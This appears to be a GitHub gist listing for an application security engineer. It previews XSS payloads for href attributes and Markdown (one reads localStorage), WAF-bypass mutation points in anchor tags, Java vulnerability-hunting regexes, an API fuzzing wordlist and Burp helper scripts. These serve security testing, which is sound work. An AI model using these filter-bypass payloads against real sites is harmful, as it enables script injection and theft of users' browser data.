MOHAMMAD SAQLAIN mrrootsec

🐈

Meowing

Application Security Engineer

22 followers · 50 following

View GitHub Profile

Recently created

Least recently created

Recently updated

Least recently updated

mrrootsec / href_bypass.html

Created April 10, 2025 06:15 — forked from hackerscrolls/href_bypass.html

XSS payloads for href

	<!--javascript -->
	ja&Tab;vascript:alert(1)
	ja&NewLine;vascript:alert(1)
	ja vascript:alert(1)
	javascript:alert()

	<!--::colon:: -->
	javascript&colon;alert()
	javascript:alert()
	javascript:alert(1)

mrrootsec / mutation_a.txt

Created June 24, 2025 15:24 — forked from hackerscrolls/mutation_a.txt

Mutation points in <a> tag for WAF bypass

	<a[1]href[2]=[3]"[4]java[5]script:[6]alert(1)">

	[1]
	Bytes:
	\x09 \x0a \x0c \x0d \x20 \x2f

	<a/href="javascript:alert(1)">
	<a\x09href="javascript:alert(1)">

	[2,3]

mrrootsec / README.md

Created June 29, 2025 11:42 — forked from win3zz/README.md

Useful regex patterns to find vulnerabilities in a Java code and Java security code review tools

Useful Regex Patterns to Find Vulnerabilities in Java Code

1. Hardcoded Credentials / Secrets

These patterns look for sensitive information directly embedded in the code.

Generic Passwords / Secrets / Tokens:
- Regex:

mrrootsec / Json_columns.bambda

Created July 5, 2025 16:45

JSON param key as column name

	name: JSON param key as column name
	function: VIEW_FILTER
	location: PROXY_HTTP_HISTORY
	source: \|+
	/**
	* Extracts a JSON parameter and creates a column named after the parameter.
	* @author mrrootsec
	*/

	var req = requestResponse.request();

mrrootsec / gist:3c99eecd740983774738950c74ada109

Created July 24, 2025 11:20 — forked from tamzidr/gist:ec225b4b9bc76971e41541cf32e319fc

Markdown XSS Payloads

	Links:

	[Basic](javascript:alert('Basic'))
	[Local Storage](javascript:alert(JSON.stringify(localStorage)))
	[CaseInsensitive](JaVaScRiPt:alert('CaseInsensitive'))
	[URL](javascript://www.google.com%0Aalert('URL'))
	[In Quotes]('javascript:alert("InQuotes")')

	Images:

mrrootsec / List of API endpoints & objects

Created August 20, 2025 03:39 — forked from yassineaboukir/List of API endpoints & objects

A list of 3203 common API endpoints and objects designed for fuzzing.

	0
	00
	01
	02
	03
	1
	1.0
	10
	100
	1000

mrrootsec / fetch2BurpRAW.js

Last active October 24, 2025 04:45

Convert fetch to Burp RAW Request

javascript:(function(){const c='burp_converter_'+Date.now(),d=document.createElement('div');d.id=c;d.innerHTML='<div style="position:fixed;top:50%;left:50%;transform:translate(-50%,-50%);width:90%;max-width:800px;max-height:90vh;background:#f5f5f5;border:2px solid #333;border-radius:8px;box-shadow:0 4px 20px rgba(0,0,0,0.3);z-index:999999;font-family:\'Courier New\',monospace;overflow:hidden;display:flex;flex-direction:column"><div style="background:#222;color:#fff;padding:12px 16px;font-weight:bold;font-size:14px;display:flex;justify-content:space-between;align-items:center"><span>Fetch to Burp Converter</span><button id="'+c+'_close" style="background:#ff4444;color:white;border:none;padding:4px 8px;border-radius:3px;cursor:pointer;font-weight:bold">×</button></div><div style="flex:1;overflow-y:auto;padding:16px;display:flex;flex-direction:column;gap:16px"><div><label style="display:block;margin-bottom:6px;font-weight:bold;font-size:12px">Input (fetch call, object, or raw HTTP):</label><textarea id="'+c+'_in

OlderNewer